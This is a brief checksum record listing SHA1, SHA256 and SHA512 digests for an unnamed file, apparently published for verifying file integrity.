SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
